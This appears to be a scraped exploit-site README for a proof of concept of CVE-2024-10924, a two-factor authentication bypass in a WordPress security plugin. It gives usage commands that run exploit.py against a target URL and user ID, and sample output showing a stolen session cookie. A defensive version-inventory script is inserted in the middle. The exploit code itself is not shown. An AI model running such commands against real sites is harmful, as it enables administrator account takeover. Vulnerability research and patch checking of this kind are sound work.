## https://sploitus.com/exploit?id=B95DDF3F-F614-57F8-AAF7-C158ABE57264
# POC for CVE-2024-10924

An error-handling flaw in the REST API of the Really Simple Plugins WordPress plugin (versions 9.0.0 through 9.1.1.1 inclusive) allows an attacker, when Two-Factor Authentication is enabled, to bypass authentication and take control of an existing user or administrator account.

As I'm a nice guy, you'll also find version 9.1.1.1 of the plugin. Just unzip it and upload it to the `wp-content/plugins` folder. Don't forget to activate the plugin and enable 2FA.
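For checking whether an installation falls inside the affected range given above, the following inventory script is an added example, not part of this repository or of the plugin. It reads the standard WordPress plugin header (`Plugin Name:` / `Version:`) from each plugin folder; the `name_pattern` default is an assumption to adjust to the plugin name your site shows.

```python
import re
import sys
from pathlib import Path

# Affected range as stated on this page: 9.0.0 through 9.1.1.1, inclusive.
AFFECTED_MIN, AFFECTED_MAX = (9, 0, 0, 0), (9, 1, 1, 1)

# WordPress plugin header fields live in a comment at the top of a PHP file.
HEADER_RE = re.compile(
    r"^[ \t/*#@]*(Plugin Name|Version):[ \t]*(.+?)[ \t\r]*$", re.I | re.M)


def parse_version(text, width=4):
    """'9.1' -> (9, 1, 0, 0); None for suffixes such as '9.1-beta'."""
    parts = text.strip().split(".")
    if len(parts) > width or not all(p.isdecimal() for p in parts):
        return None
    return tuple(int(p) for p in parts) + (0,) * (width - len(parts))


def is_affected(version_text):
    v = parse_version(version_text)
    return v is not None and AFFECTED_MIN <= v <= AFFECTED_MAX


def read_header(php_file):
    """Return the first 'plugin name' and 'version' found in the file head."""
    head = Path(php_file).read_bytes()[:8192].decode("utf-8", "replace")
    fields = {}
    for key, value in HEADER_RE.findall(head):
        fields.setdefault(key.lower(), value)
    return fields


def scan_plugins(plugins_dir, name_pattern=r"really simple"):
    """Return (folder, name, version) for matching plugins in the range.

    name_pattern is an assumption; set it to the plugin name your site shows.
    """
    findings = []
    for php_file in sorted(Path(plugins_dir).glob("*/*.php")):
        h = read_header(php_file)
        name, version = h.get("plugin name", ""), h.get("version", "")
        if re.search(name_pattern, name, re.I) and is_affected(version):
            findings.append((php_file.parent.name, name, version))
    return findings


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "wp-content/plugins"
    for folder, name, version in scan_plugins(target):
        print(f"AFFECTED {folder}: {name} {version}")
```

Versions with a non-numeric suffix are reported as not affected because they cannot be compared; review those by hand.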

## Requirements

Install the required dependencies using `pip`:

```bash
pip install -r requirements.txt
```

#### Dependencies List

-   **argparse**: To parse command-line arguments.
-   **validator-collection**: To validate the URL format.
-   **requests**: To send HTTP POST requests.
-   **random**: To generate a random nonce for the payload.

## Usage

### Command Syntax

```bash
python exploit.py [-id USER_ID] URL
```

### Examples

1. **With a specific User ID**:

    ```bash
    python exploit.py -id 10 http://localhost:8886/
    ```

    This sends the exploit payload with a user ID of `10`.

2. **Without specifying a User ID**:

    ```bash
    python exploit.py http://localhost
    ```

    This defaults the user ID to `1`.

## Example Output

### Successful Exploit

```plaintext
Exploit successful.

--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
```

### Failed Exploit

```plaintext
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
```

## Security Considerations

-   **Use responsibly**: This script is for educational and penetration testing purposes only.
-   **Authorization**: Ensure you have explicit permission to test the target system.
-   **HTTPS**: Disable SSL verification (`verify=False`) only if necessary for testing.

## License

IDK but I'm not responsible for anything.